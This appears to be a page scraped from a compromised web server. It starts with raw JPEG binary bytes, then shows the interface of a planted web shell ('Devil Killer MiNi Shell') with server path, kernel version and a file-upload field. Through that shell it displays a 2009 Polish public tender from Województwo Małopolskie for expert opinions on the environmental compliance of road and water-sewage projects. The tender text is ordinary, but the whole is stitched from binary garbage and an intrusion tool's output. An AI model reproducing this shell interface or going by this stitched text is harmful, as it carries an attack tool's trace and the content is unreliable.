JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20090129/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20090129/30405-N-2009.html

<p class="kh_header"><b>Kraków: Świadczenie usług polegających na sporządzeniu opinii eksperckich, dotyczących zgodności z wymogami środowiskowymi projektów drogowych i wodno-ściekowych wybranych do dofinansowania przez Zarząd Województwa Małopolskiego</b><br>
<b>Numer ogłoszenia: 30405 - 2009; data zamieszczenia: 29.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Województwo Małopolskie , ul. Basztowa 22, 31-156 Kraków, woj. małopolskie, tel. 012 4300394, 6303408,6303122, faks 012 6160144,6303126.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.malopolskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług polegających na sporządzeniu opinii eksperckich, dotyczących zgodności z wymogami środowiskowymi projektów drogowych i wodno-ściekowych wybranych do dofinansowania przez Zarząd Województwa Małopolskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług polegających na sporządzeniu opinii eksperckich dotyczących zgodności z wymogami środowiskowymi projektów drogowych i wodno-ściekowych wybranych do dofinansowania przez Zarząd Województwa Małopolskiego w ramach Małopolskiego Regionalnego Programu Operacyjnego (MRPO) na lata 2007-2013.

Zamówienie obejmuje sporządzenie opinii eksperckich dotyczących: 18 projektów z zakresu gospodarki wodno-ściekowej, 13 projektów z zakresu dróg o znaczeniu regionalnym, oraz 15 projektów z zakresu dróg powiatowych.

SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA


1. Uzasadnienie realizacji zamówienia

W ramach Małopolskiego Regionalnego Programu Operacyjnego na lata 2007-2013 (MRPO) zapewnione zostały możliwości dofinansowania szeregu przedsięwzięć, z których część może potencjalnie rodzić negatywne skutki dla środowiska naturalnego. Prawdopodobieństwo takiego negatywnego oddziaływania jest szczególnie wysokie w przypadku inwestycji z zakresu infrastruktury drogowej, nieco mniejsze w przypadku innych rodzajów infrastruktury.

W okresie od lutego do grudnia 2008 r. Instytucja Zarządzająca MRPO realizowała konkursy, których celem było przyznanie dofinansowania projektom z zakresu infrastruktury drogowej i gospodarki wodno-ściekowej. W okresie poprzedzającym te konkursy oraz w okresie ich trwania Sejm Rzeczypospolitej Polskiej przyjął daleko idące zmiany w prawie, dotyczące wymagań w zakresie przygotowania inwestycji pod kątem oceny ich wpływu na środowisko naturalne. W szczególności zmiany te obejmują Ustawę z dnia 26 kwietnia 2007 r. o zmianie ustawy Prawo ochrony środowiska oraz niektórych innych ustaw (Dz.U. 2007 Nr 88, poz. 587) oraz Ustawę z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz.U. 2008 Nr 199, poz. 1227). Dynamiczna sytuacja prawna powoduje wątpliwość, czy wszystkie z projektów wybranych do dofinansowania w wyniku przeprowadzenia ww. konkursów spełniają wymagania związane z przepisami ochrony środowiska. 

Mając to na względzie, Departament Polityki Regionalnej Urzędu Marszałkowskiego Województwa Małopolskiego, działając jako Jednostka ds. Zarządzania MRPO dąży do zbadania inwestycji, którym przyznano dofinansowanie pod kątem zgodności z przepisami w zakresie oddziaływania na środowisko. Ze względu na brak merytorycznej zdolności pracowników Urzędu do samodzielnego przeprowadzenia takiej weryfikacji (zarówno pracownicy Departamentu Funduszy Europejskich, jak i Departamentu Polityki Regionalnej są w trakcie odbywania odpowiednich szkoleń), niezbędne jest zlecenie opracowania adekwatnych opinii eksperckich.

Sporządzenie opinii będzie finansowane ze środków Osi Priorytetowej 9. Pomoc techniczna MRPO i jest traktowane jako działanie mające na celu pomoc Instytucji Zarządzającej MRPO w realizacji programu zgodnie z obowiązującym prawem.

2. Ogólne określenie przedmiotu zamówienia

2.1. Przedmiotem zamówienia są usługi polegające na sporządzeniu opinii eksperckich, opracowanych z odniesieniem do obowiązujących przepisów Ustawy z dnia 27 kwietnia 2001r. Prawo ochrony środowiska (Dz. U. 08 nr 25, poz. 150 - tekst jednolity z późn. zm.), Ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz.U. 2008 Nr 199, poz. 1227), Dyrektywy Rady nr 85/337 EWG z dnia 27 czerwca 1985 r. w sprawie oceny skutków wywieranych przez niektóre przedsięwzięcia publiczne i prywatne na środowisko naturalne (Dz. Urz. UE L 175 z 5.7.1985, z późn. zm.) i innych przepisów powiązanych oraz do zaleceń, rekomendacji, podręczników dobrych praktyk wydanych przez organy wspólnotowe i władze polskie, w tym w szczególności do Wytycznych Ministra Rozwoju Regionalnego z dnia 3 czerwca 2008 r. w zakresie postępowania w sprawie oceny oddziaływania na środowisko dla przedsięwzięć współfinansowanych z krajowych i regionalnych programów operacyjnych, których to opinii celem jest określenie, indywidualnie dla każdego z opiniowanych projektów, czy proces przygotowania projektu był zgodny z ww. przepisami i zaleceniami.

W przypadku jeżeli proces przygotowania projektu zawierał braki lub niezgodności z wymienionymi dokumentami, opinia ekspercka powinna - indywidualnie dla każdego projektu - stwierdzić, czy ta rozbieżność powoduje dyskwalifikacje projektu oraz wskazać działania, jakie należy podjąć i dokumenty, jakie należy opracować, ażeby uzupełnić te braki. W takim przypadku opinia ekspercka powinna określać - indywidualnie dla każdego projektu - realistyczny harmonogram (tj. harmonogram uwzględniający określone prawem terminy wydawania brakujących decyzji, uzgodnień, minimalnego okresu prowadzenia konsultacji, etc., jak również możliwości przeprowadzenia ewentualnych badań w terenie, zależne od uwarunkowań przyrodniczych, np. od okresów lęgowych ptaków) uzupełniania tych braków. Dodatkowym czynnikiem uwzględnianym przy określeniu ww. harmonogramu lub opisanym w opinii eksperckiej odrębnie mogą być faktycznie obserwowane terminy uzyskiwania odpowiednich decyzji administracyjnych i uzgodnień.


Opracowanie, o którym mowa powyżej zwane jest dalej opinią ekspercką.

2.2. Opinia ekspercka dotyczyć będzie projektów realizowanych na terenie Województwa Małopolskiego. Okres sporządzenia wszystkich opinii eksperckich objętych niniejszym zamówieniem będzie nie dłuższy niż 3 miesiące od dnia zawarcia umowy pomiędzy Zamawiającym a Wykonawcą Wykonawcami. Dostęp do dokumentacji poddawanej zaopiniowaniu zostanie zapewniony Wykonawcy niezwłocznie po podpisaniu umowy poprzez wgląd do tej dokumentacji w siedzibie Zamawiającego w Krakowie, przy ul. Wielickiej 72. 


2.3. Przedmiot opinii eksperckiej.

Opinia ekspercka dotyczyć będzie projektów wyłonionych do dofinansowania ze środków Małopolskiego Regionalnego Programu Operacyjnego na lata 2007-2013, wskazanych w następujących uchwałach Zarządu Województwa Małopolskiego:
a)	Uchwała Zarządu Województwa Małopolskiego z dnia 6 listopada 2008 roku Nr 1004/08 w sprawie wyboru projektów do dofinansowania w ramach konkursu nr 2 2008 7.1 dla Działania 7.1 Gospodarka wodno-ściekowa Małopolskiego Regionalnego Programu Operacyjnego na lata 2007-2013;
b)	Uchwała Nr 15/09 Zarządu Województwa Małopolskiego z dnia 8 stycznia 2009 roku w sprawie zmiany Uchwały Nr 1004/08 Zarządu Województwa Małopolskiego z dnia 6 listopada 2008 r. w sprawie wyboru projektów do dofinansowania, w ramach Działania 7.1 Gospodarka wodno-ściekowa Małopolskiego Regionalnego Programu Operacyjnego na lata 2007 - 2013.
c)	Uchwała Zarządu Województwa Małopolskiego z dnia 2 grudnia 2008 roku Nr 1094/08 w sprawie wyboru projektów do dofinansowania w ramach konkursu nr 1/2008/4.1.a dla Działania 4.1 Rozwój infrastruktury drogowej, Schemat A Drogi o znaczeniu regionalnym Małopolskiego Regionalnego Programu Operacyjnego na lata 2007-2013;
d)	Uchwała Zarządu Województwa Małopolskiego Nr 1096/08 z dnia 2 grudnia 2008 roku w sprawie wyboru projektów do dofinansowania w ramach konkursu nr 3/2008/4.1.c dla Działania 4.1 Rozwój infrastruktury drogowej, Schemat C Drogi powiatowe Małopolskiego Regionalnego Programu Operacyjnego na lata 2007-2013.
Opinia ekspercka zostanie sporządzona co do zasady w oparciu o informacje zawarte w dokumentacji konkursowej każdego z badanych projektów (dostęp do dokumentacji poddawanej zaopiniowaniu zostanie zapewniony Wykonawcy poprzez wgląd do tej dokumentacji w siedzibie Zamawiającego w Krakowie, przy ul. Wielickiej 72), obejmującej w szczególności:
- wniosek o dofinansowanie;
- studium wykonalności;
- raport z oceny oddziaływania na środowisko (jeżeli istnieje, a jeśli nie istnieje - uzasadnienie odstąpienia od opracowania raportu);
- pozwolenie na budowę, zgłoszenie budowy, decyzja o ustaleniu lokalizacji inwestycji celu publicznego, decyzja o ustaleniu warunków zabudowy, decyzja o ustaleniu lokalizacji drogi - w zależności, od tego, które z wymienionych decyzji były uzyskiwane dla danego projektu;
- decyzje organów ochrony środowiska;
- wyciąg z dokumentacji technicznej - załącznik do wniosku o dofinansowanie.

W przypadku, gdy zakres informacji zawartych w ww. dokumentacji konkursowej będzie niewystarczający dla sporządzenia opinii eksperckiej, Zamawiający przewiduje możliwość uzyskania przez Wykonawcę - za pośrednictwem Zamawiającego - dodatkowych wyjaśnień od Wnioskodawcy danego projektu lub umożliwienie wglądu w posiadaną przez niego szerszą dokumentację. W takim przypadku termin realizacji zamówienia określony w umowie zostaje odpowiednio wydłużony o okres czasu poświęcony na uzyskanie dodatkowych wyjaśnień od Beneficjenta. Wydłużenie terminu realizacji zamówienia odnosić się będzie do opinii eksperckiej dotyczącej projektu, dla którego niezbędne było uzyskanie dodatkowych wyjaśnień.


2.4. Językiem umowy w sprawie niniejszego zamówienia publicznego będzie język polski. Cała oficjalna korespondencja i dokumenty przygotowane będą w języku polskim.

3. Szczegółowe określenie przedmiotu zamówienia

3.1. Przedmiot zamówienia - liczba opinii eksperckich.

3.1.1. Zamówienie obejmuje sporządzenie opinii eksperckich dotyczących:

a)	18 projektów z zakresu gospodarki wodno-ściekowej, wybranych do dofinansowania  cyt. powyżej uchwałą nr 1004/08 oraz cyt. powyżej uchwałą Nr 15/09 Zarządu Województwa Małopolskiego z dnia 8 stycznia 2009 roku w sprawie zmiany Uchwały Nr 1004/08. 
b)	13 projektów z zakresu dróg o znaczeniu regionalnym, wybranych do dofinansowania cyt. powyżej uchwałą nr 1094/08;
c)	15 projektów z zakresu dróg powiatowych, wybranych do dofinansowania cyt. powyżej uchwałą nr 1096/08.

Łącznie zamówienie obejmuje sporządzenie 46 opinii eksperckich.

3.1.2. Jednostką pomiaru wykonanych usług i jednocześnie jednostką stosowaną do rozliczeń za wykonane usługi jest opinia ekspercka, odnosząca się do jednego projektu. 

Zaoferowana przez Wykonawcę cena jednostkowa za sporządzenie opinii eksperckiej powinna uwzględniać wszelkie koszty ponoszone przez Wykonawcę/Wykonawców w związku z jej sporządzeniem, takie jak np. koszty prac ekspertów, koszty dojazdów, koszty prowadzenia biura i inne koszty ogólne ponoszone przez Wykonawcę, wynikające bezpośrednio z realizacji zamówienia.

3.2. Przedmiot zamówienia - charakterystyka zamawianych usług.

3.2.1. Opinia ekspercka sporządzona indywidualnie dla każdego projektu, zostanie opracowana na podstawie weryfikacji dokumentów wskazanych w punkcie 2.3., 
z ewentualnym wykorzystaniem dodatkowych informacji uzyskanych od Wnioskodawcy danego projektu i będzie zawierać ustalenia, o których mowa w punkcie 2.1.

Weryfikacja będzie prowadzona w odniesieniu do:
a)	lokalizacji projektu pod kątem ingerencji w obszary należące do Sieci NATURA2000/2008, wraz z określeniem typu obszaru (w oparciu o przepisy  Dyrektywy Rady nr 92/43/EWG a dnia 21 maja 1992r. w sprawie ochrony siedlisk naturalnych oraz dzikiej fauny i flory, (Dz. Urz. UE L  206  z 22 lipca 1992, z późn. zm.) i Przepisy Dyrektywy Rady nr 79/409/EWG z dnia 2 kwietnia 1979r. w sprawie ochrony dzikich ptaków (Dz. Urz. UE L 103 z 25 kwietnia 1979, z późn. zm.)) oraz stwierdzeniem na podstawie dostępnych materiałów (głównie: map obszarów chronionych, standardowych formularzy danych) charakteru oddziaływań oraz integralności obszaru. W przypadku, gdy lokalizacja może oznaczać ingerencję w obszar należący do Sieci NATURA2000/2008 Wykonawca zbada, czy wnioskowany Projekt określa środki podjęte w celu ochrony obszaru, a jeśli we wniosku takie nie są określone - wskaże rodzaje środków, jakie powinny być jego zdaniem podjęte w celu ochrony obszaru; 
b)	ważności wydanych dla projektu decyzji administracyjnych (pozwolenie na budowę, zgłoszenie budowy, decyzja o ustaleniu lokalizacji inwestycji celu publicznego, decyzja o ustaleniu warunków zabudowy, decyzja o ustaleniu lokalizacji drogi; decyzje organów ochrony środowiska pod kątem nowo obowiązujących procedur wynikających z przepisów środowiskowych);
c)	dokumentacji technicznej projektu będącej załącznikiem do wniosku 
o dofinansowanie, pod kątem spełnienia obowiązujących wymogów środowiskowych (w tym w szczególności spełnienia obowiązku wariantowego planowania projektu, konsultacji społecznych na etapie projektowania);
d)	dokumentacji procesu oceny oddziaływania na środowisko, w tym raportu z oceny oddziaływania na środowisko, pod kątem prawidłowości jej sporządzenia w świetle obowiązujących przepisów co do wymogów środowiskowych.


Czynności określone w lit. a)-d) wykonane będą na podstawie listy sprawdzającej przygotowanej przez Wykonawcę, będącej elementem oferty przetargowej.

3.2.2. Zamawiający zapłaci Wykonawcy wynagrodzenie za sporządzone opinie eksperckie zgodnie ze stawką umowną na podstawie protokołu zdawczo-odbiorczego potwierdzającego prawidłową realizację usługi. Wzór protokołu z realizacji usługi stanowi załącznik nr 8 do niniejszej specyfikacji. 

3.2.3. Świadczenie usług doradczych będzie wykonywane wyłącznie przez osoby (zespoły osób), o których mowa w punkcie VI ppkt 2 specyfikacji istotnych warunków zamówienia, wskazane w ofercie Wykonawcy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.31.30.00-5, 72.22.40.00-1, 79.41.10.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 90.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Przed upływem terminu składania ofert, wykonawca zobowiązany jest wnieść wadium przetargowe, na czas równy okresowi związania ofertą w wysokości:
3200  zł, słownie: trzy tysiące dwieście złotych.

2. Wadium może być wniesione w jednej lub kilku formach wymienionych poniżej:
a)	w pieniądzu,
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c)	gwarancjach bankowych,
d)	gwarancjach ubezpieczeniowych,
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jednolity: Dz. U. z 9 marca 2007, Nr 42, poz. 275).
3. Wadium w formie pieniężnej winno być wniesione przelewem na konto: 24 1500 1487 1214 8002 2631 0000 z dopiskiem Wpłata wadium - przetarg na świadczenie usług polegających na sporządzeniu opinii eksperckich, dotyczących zgodności z wymogami środowiskowymi projektów drogowych i wodno-ściekowych wybranych do dofinansowania przez Zarząd Województwa Małopolskiego.

4. Wadium w pozostałych formach winno być wniesione do kasy (Urząd Marszałkowski Województwa Małopolskiego ul. Racławicka 56, 30-017 Kraków, pokój 316). Kasa jest czynna: w dni robocze w godzinach 8.30 - 10.00 oraz 13.00 - 15.00.

5. Jeżeli wadium wnoszone będzie w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, gwarancjach bankowych, gwarancjach ubezpieczeniowych albo w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości, w treści tych dokumentów musi być zawarty zapis, że wykonawca, którego oferta została wybrana, traci wadium na rzecz zamawiającego w przypadku, gdy:
a)	odmówi podpisania umowy na warunkach określonych w ofercie,
b)	zawarcie umowy stanie się niemożliwe z przyczyn leżących po stronie wykonawcy.
Ponadto w treści tych dokumentów musi być zawarty zapis, że wykonawca traci wadium jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 1 ustawy, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy lub pełnomocnictw. 
6. W przypadku braku ww. zapisu wadium nie zostanie uznane za prawidłowo wniesione.
7. Niedopuszczalne jest wprowadzanie jakichkolwiek warunków ograniczających zamawiającemu wypłacenie wadium. 
8. Wykonawca, którego oferta nie będzie zabezpieczona prawidłowo wniesionym wadium zostanie wykluczony z postępowania.
9. Zamawiający zwraca lub zatrzymuje wadium na zasadach i w trybie art. 46 ustawy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie zamówienia mogą ubiegać się wykonawcy spełniający wymagania określone w art. 22 ust. 1 ustawy, w tym spełniają następujące warunki szczegółowe:
2.	Wykonawca musi dysponować osobami zdolnymi do wykonania zamówienia:

	co najmniej trzema osobami, z których każda opracowała lub uczestniczyła w opracowaniu co najmniej dwóch raportów o oddziaływaniu przedsięwzięcia na środowisko, o których mowa 
w ustawie z 27.04.2001 r. Prawo ochrony środowiska (Dz.U. z 2006 Nr 129, poz. 902 ze zm.), dla przedsięwzięć mogących znacząco oddziaływać na środowisko, wymienionych w § 2 ust 1 Rozporządzenia Rady Ministrów z dnia 9 listopada 2004r. w sprawie określenia rodzajów przedsięwzięć mogących znacząco oddziaływać na środowisko oraz szczegółowych uwarunkowań związanych z kwalifikowaniem przedsięwzięcia do sporządzenia raportu o oddziaływaniu na środowisko (Dz. U. Nr. 257, poz. 2573, oraz z 2007r. Dz. U. Nr 158, poz. 1105). Ponadto osoba ta powinna posiadać doświadczenie pozwalające na sporządzenie raportu o oddziaływaniu przedsięwzięcia na środowisko zgodnie z ustawą z dnia 3.10.2008r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz.U. z 2008 r. Nr 199, poz. 1227), ustawą Prawo ochrony środowiska (Dz. U. z 2008 r. Nr 25, poz. 150) oraz  ustawą 
o ochronie przyrody (Dz.u. z 2004 r. Nr 92, poz. 880, z późn. zm.), 

	co najmniej jedną osobą, która wykonała samodzielnie co najmniej jedną usługę polegającą na sporządzeniu projektu budowlanego lub dokumentacji wykonawczej drogi publicznej który otrzymał pozwolenie na budowę lub wykonała samodzielnie co najmniej jedną usługę polegającą na sporządzeniu projektu budowlanego lub dokumentacji wykonawczej sieci wodociągowej lub kanalizacyjnej, które otrzymały pozwolenie na budowę,

	co najmniej jedną osobą, która posiada odpowiednie doświadczenie 
w  przygotowaniu lub weryfikacji dokumentacji w zakresie postępowań administracyjnych 
z obszaru prawa budowlanego (pozwolenie na budowę, zgłoszenie budowy, decyzja o ustaleniu lokalizacji inwestycji celu publicznego, decyzja o ustaleniu warunków zabudowy, decyzja o ustaleniu lokalizacji drogi) i procedur wynikających z przepisów środowiskowych.

3.	Wykonawca musi być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej w wysokości co najmniej 100 000 zł. 

4.	Wykonawca musi się wykazać następującym doświadczeniem:

a) Wykonawca winien posiadać doświadczenie w wykonaniu, a w przypadku świadczeń okresowych lub ciągłych również wykonywaniu, w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) usług polegających na sporządzeniu lub doradztwie przy sporządzeniu:

1)	pięciu raportów o oddziaływaniu przedsięwzięcia na środowisko dla projektów z zakresu budowy lub przebudowy obiektów budowlanych lub dróg publicznych lub sieci wodociągowych lub sieci kanalizacyjnych, każdy o wartości wykonanych usług  min. 25 000 zł, 
2)	dwóch projektów dokumentacji wykonawczej drogi publicznej, które otrzymały pozwolenie na budowę (różne projekty dróg miejskich i pozamiejskich), lub sporządzeniu dwóch projektów budowlanych lub dokumentacji wykonawczej sieci wodociągowej lub kanalizacyjnej które otrzymały pozwolenie na budowę, każdy o wartości wykonanych usług min. 50 000 zł; 

5. Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w formule spełnia - niespełnia, 
w oparciu o dokumenty załączone do oferty, a których wykaz zawiera punkt VII niniejszej specyfikacji. 

6. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (np konsorcjum, spółka cywilna),   ustanawiając pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (do oferty należy załączyć odpowiednie pełnomocnictwo). W takim przypadku warunki udziału w postępowaniu, dotyczące wykonawcy, odnoszą się odpowiednio do wykonawców, którzy ubiegają się wspólnie o zamówienie publiczne. Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z podmiotem występującym jako pełnomocnik pozostałych. Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkie podmioty występujące wspólnie. Wykonawcy wspólnie ubiegający się o zamówienie ponoszą solidarną odpowiedzialność za wykonanie umowy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Wraz z ofertą wykonawca winien złożyć oświadczenie o spełnieniu warunków udziału w postępowaniu - zał. nr 3 do siwz oraz dokumenty potwierdzające spełnianie warunków udziału w postępowaniu:
a)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
b)	wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, 
(przy uwzględnieniu wymagań określonych w pkt VI ppkt 4 SIWZ), z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców - zał. nr 6 oraz załączenia dokumentów potwierdzających, że usługi zostały wykonane należycie,
c)	polisę a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, w wysokości określonej 
w pkt VI ppkt 3 SIWZ,  
d)	wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć 
